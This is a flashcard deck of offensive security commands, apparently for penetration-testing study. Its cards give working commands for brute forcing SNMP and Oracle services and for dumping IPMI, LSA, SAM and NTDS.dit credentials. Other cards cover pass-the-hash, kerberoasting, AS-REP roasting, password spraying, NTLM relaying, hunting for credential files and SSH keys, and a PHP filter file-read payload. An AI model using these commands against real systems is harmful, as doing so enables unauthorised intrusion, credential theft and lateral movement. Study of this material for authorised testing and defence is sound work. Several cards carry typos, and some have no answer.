Linux Hacking Commands Flashcards by Bram Kesseler

How to walk OIDs snmp?

snmpwalk -v2c -c [comunity string] [ip]

How well did you know this?

Not at all

Perfectly

How to brute force community strings snmp?

onesixtyone -c [wordlist] [ip]

How well did you know this?

Not at all

Perfectly

How to bruteforce OIDs snmp?

braa [community string]@[ip]:.1.3.6.*

How well did you know this?

Not at all

Perfectly

How to bruteforce oracle sids with nmap?

sudo nmap -p 1521 –open –script oracle-sid-brute

How well did you know this?

Not at all

Perfectly

How to enumerate oracledb service?

./odat.py all -s [ip]

How well did you know this?

Not at all

Perfectly

How to connect to oracledb service?

sqlplus [user]/[pass]@[ip]/[sid]

How well did you know this?

Not at all

Perfectly

How to enumerate IPMI with nmap?

sudo nmap -sU –script ipmi-version -p 623 [hostname]

How well did you know this?

Not at all

Perfectly

What is the IPMI dumphashes module metasploit?

use auxiliary/scanner/ipmi/ipmi_dumphashes

How well did you know this?

Not at all

Perfectly

How to use xfreerdp with pass the hash?

xfreerdp /v:[ip] /u:[user] /pth:[hash]

How well did you know this?

Not at all

Perfectly

How to kerberoast with impacket

GetUserSPNs.py [Domain/Username:password] -dc-ip [dc_ip] -request

How well did you know this?

Not at all

Perfectly

How to kerberoast on domain joined machine rubeus?

Rubeus.exe kerberoast

How well did you know this?

Not at all

Perfectly

How to check if smbexec is enabled with smbmap?

smbmap -H $ip -u [username] -p [password] -x “whoami”

How well did you know this?

Not at all

Perfectly

how to map an smb share with smbmap?

smbmap -H [ip] -u [username] -p [password] -r [share name]

How well did you know this?

Not at all

Perfectly

How to spray passwords for AD users?

nxc smb [host] -u [wordlist of users] -p [password wordlist] –continue-on-success

How well did you know this?

Not at all

Perfectly

How to spray hashes for AD users?

nxc smb [host] -u [wordlist of users] -H [hash list] –continue-on-success

How well did you know this?

Not at all

Perfectly

How to check if smb exec is enabled with nxc?

nxc smb [ip] -u [user] -d [doamin] -p [pass] -x whoami

How well did you know this?

Not at all

Perfectly

How to check if smb exec is enabled with nxc and execute command with local admin?

nxc smb [ip] -u [user] -d [doamin] -p [pass] -x whoami —local-auth

How well did you know this?

Not at all

Perfectly

How to enumerate smb shares with nxc?

crackmapexec smb [ip] -u [user] -p [pass] –shares

How well did you know this?

Not at all

Perfectly

How to enumerate domain users with rid brute?

nxc smb $ip -u [user] -p [pass] –rid-brute

How to remotely dump lsa?

crackmapexec smb [ip] –local-auth -u ‘admin’ -p [pass] –lsa

How to remotely dump SAM?

crackmapexec smb [ip] –local-auth -u ‘admin’ -p [pass] –sam

How to remotely dump NTDS.dit

crackmapexec smb [ip] -u [user] -p [pass] –ntds

How to remotely execute commands with wmi?

wmiexec.py [user]:[pass]@[ip] [command]

How to remotely execute commands with wmi by passing a hash?

python3 wmiexec.py [user]:[pass]@[ip] -hashes [hash] [command]

How to psexec remotely?

python3 psexec.py [user]:[pass]@[ip] [command]

How to find AS-REP roastable users?

ldapdomaindump -u '[doamin]\[user]' -p [pass] [ip]

How to AS-REP roast with user list?

python3 GetNPUsers.py -dc-ip [ip] [domain]/ -usersfile users.txt

How to crack AS-REP roast hashes?

hashcat -m 18200 [hashes] [wordlist] --force

How to set up an NTLM relay smb server? 1

python3 ntlmrelayx.py -smb2support -o hashfile

How to set up an NTLM relay smb server? 2

impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp

How to enumerate AD Users using smb exec?

python3 GetADUsers.py [domain]/[user]:[pass] -dc-ip [ip]

How to enumerate AD Users using smb exec by passing the hash?

python3 GetADUsers.py [domain]/[user]@[ip] -hashes [hash]

How to dump SAM and LSA?

impacket-secretsdump -sam [sam] -system [system] -security [security]

How to connect to smb share with pass the hash?

impacket-smbclient -hashes [hash] [domain]/[user]@[ip]

How to convert windows ccache to linux kirbi? and vice versa

imacket-ticketConverter [ccache] [kirbi]

How to easily enumerate an AD domain quickly?

enum4linux -a

How to spider an smb share?

smbmap -H [target_ip] -u [username] -p [password] -R [share_name] --depth 5

How to download a file from an smb share with smbmap?

smbmap -H [target_ip] -u [username] -p [password] -s [share] --download '[share]\[remote_file_path]'

How to search for files with credentials?

for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done

How to search for files with passwords?

How to search for databases?

How to look for txt files (notes) in home directory?

find /home/* -type f -name "*.txt" -o ! -name "*.*"

How to look for scripts?

for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share";done

How to check cronjobs?

cat /etc/crontab

How to search for private SSH keys?

grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"

How to look for public SSH keys?

grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"

What is the payload for base64 PHP filter?

php://filter/read=convert.base64-encode/resource=[file]